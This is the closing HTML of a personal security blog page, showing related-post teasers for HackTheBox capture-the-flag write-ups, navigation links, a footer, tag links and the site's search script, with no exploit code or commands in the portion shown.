      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4"><div class="card">
        <a href="/posts/hackthebox/backdoor.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2022-04-23 00:00:00 +0100">Apr 23, 2022</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Backdoor - HackTheBox</h3>
            <div class="text-muted small">
              <p>Backdoor is a very easy linux box on HackTheBox. It starts with a web service running wordpress with a plugin that’s vulnerable to path traversal, which you can use to read arbitrary files on the b...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/admirertoo.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2022-05-29 00:00:00 +0100">May 29, 2022</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>AdmirerToo - HackTheBox</h3>
            <div class="text-muted small">
              <p>AdmirerToo is a hard-rated linux box. It starts with an SSRF exploit on Adminer to access an instance of OpenTSDB on port 4242, which is vulnerable to RCE. This will give you a shell on the box as ...
              </p>
            </div>
          </div>
        </a>
      </div><div class="card">
        <a href="/posts/hackthebox/cyberapoc_23.html">
          <div class="card-body"><!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeagosmall"
    date="2023-03-23 00:00:00 +0100">Mar 23</em>
<h3 class="pt-0 mt-1 mb-3" data-toc-skip>Cyber Apocalypse 2023 - HackTheBox</h3>
            <div class="text-muted small">
              <p>Cyber Apocalypse 2023 is a very nice jeopardy-style CTF competition hosted by HackTheBox. It was a 5-day CTF played between 19th - 23rd March, 2023. This is a write-up on some of the challenges tha...
              </p>
            </div>
          </div>
        </a>
      </div></div> <!-- .card-deck -->
  </div> <!-- #related-posts --><!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between"><a href="/posts/dvwa/dvwa_sqli_error_based.html" class="btn btn-outline-primary"
    prompt="Older">
    <p>Error-based SQL Injection- DVWA</p>
  </a><a href="/posts/hackthebox/overflow.html" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Overflow - HackTheBox</p>
  </a></div>
<!--  The comments switcher --></div>
  </div>
</div> <!-- .row --><!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2023
        <a href="https://twitter.com/UmarAbdoul">Umar Abdul</a>.<span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p>
    </div>

    <div class="footer-right">
      <p class="mb-0">Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>
</div><!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints"><div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a><a class="post-tag" href="/tags/sql-injection/">sql injection</a></div>
  </div></div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>
</div> <!-- #main-wrapper --><div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a><!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
--><script src="/assets/js/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>
<!--
  JS selector for site.
-->

<!-- layout specified --><!-- image lazy-loading & popup -->
  <script src="/assets/js/clipboard.min.js"></script><script defer src="/assets/js/dist/post.min.js"></script><!-- commons -->

<script src="/assets/js/bootstrap.min.js"></script></body>

</html>
